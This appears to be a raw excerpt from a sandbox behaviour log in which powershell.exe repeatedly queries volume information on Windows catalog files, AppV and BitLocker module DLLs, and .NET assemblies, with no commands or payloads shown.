Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
